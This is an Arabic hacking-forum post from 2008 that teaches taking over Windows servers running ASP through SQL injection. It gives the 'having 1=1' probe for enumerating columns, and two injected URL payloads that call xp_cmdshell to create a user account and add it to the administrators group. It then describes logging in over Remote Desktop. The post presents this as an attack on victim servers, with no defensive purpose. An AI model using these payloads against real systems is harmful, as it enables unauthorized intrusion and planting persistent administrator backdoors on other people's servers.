منتديات القرصان

**alkrsan** · #1 02-16-2008, 05:01 PM

:: السلام عليـكم ورحمة الله وبركاته ::

موضوع الفيديو يتكلم عن أخذ الروت داخل نظام الوندوز دون الحاجة لرفع الشل بتطبيق ثغرات الريموت انجيكشن ( ثغرات الحقن ) .

ثغرات الانجيكشن داخل نظام لغـة ال Asp يتم بعمل ابديت او تحديث للقاعدة ..
والطلب يكون بالامر

كود PHP:


			
having 1=1

لاستخراج الاعمدة من القاعدة ومن ثم الحصر بالجروب ..

وبالتالي عملية الابديت .. وتقدر ترفع عن طريقها شل بشكل بسيط ..

الان الفيديو هذا داعم لاخذ الروت داخل نظام الويندوز ..

قبل لا نطلب

كود PHP:


			
having 1=1

بمجرد اكتشافنا للخطا في النظام ودالة exec مفعلة بالسيرفر الضحية . بالتالي يبقى احنا أكيد أخذنا الروت

وهذا الفيديو واضح وبسيط وبيوضح عمل اضافة اليوزر بالحقن ..
على الرابط التالي

كود PHP:


			
http://milw0rm.com//video/watch.php?id=70

الاوامر المستخدمـة :

أمر اضافة المستخدم :

كود PHP:


			
/file.asp?id=1; exec master..xp_cmdshell 'net user Hack-teach coldz3ro /add' ;--

أمر وضع المستخدم في قائمة الادمن ( الروت ) :

كود PHP:


			
/file.asp?id=1; exec master..xp_cmdshell 'net localgroup administartor Hack-teach /add' ;--

وبعدها تروح تعمل ريموت ديسك توب مثل ما هو موضح بالفيديو .

امل ان اكون افدتكم بالشيء القليل .

الحقوق محفوظـة ولله الحمد والشكر
المتوكل على الله : Cold z3ro